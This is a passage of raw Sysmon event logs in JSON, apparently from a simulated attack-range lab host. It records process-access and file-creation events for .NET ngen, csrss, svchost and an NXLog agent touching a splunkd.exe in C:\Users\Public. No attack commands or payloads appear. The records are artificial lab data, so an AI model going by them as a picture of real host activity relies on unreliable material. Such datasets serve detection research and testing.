(x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:53.779","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:54.560\r\nProcessGuid: {E2A3D6B1-1360-5F25-0000-0010BD550E00}\r\nProcessId: 3836\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\efc-0\\System.Data.Linq.dll\r\nCreationUtcTime: 2020-08-01 07:01:54.560","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:54.560","ProcessGuid":"{E2A3D6B1-1360-5F25-0000-0010BD550E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\efc-0\\System.Data.Linq.dll","CreationUtcTime":"2020-08-01 07:01:54.560","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:54.623\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1362-5F25-0000-00106D5A0E00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:54.623","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1362-5F25-0000-00106D5A0E00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:54.623\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1362-5F25-0000-00106D5A0E00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:54.623","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1362-5F25-0000-00106D5A0E00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:54.638\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1362-5F25-0000-00106D5A0E00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:54.638","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1362-5F25-0000-00106D5A0E00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:54.748\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010FAB80B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:54.748","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010FAB80B00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:54.748\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010FAB80B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:54.748","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010FAB80B00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:54.748\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010FAB80B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:54.748","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010FAB80B00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:54.779\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:54.779","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 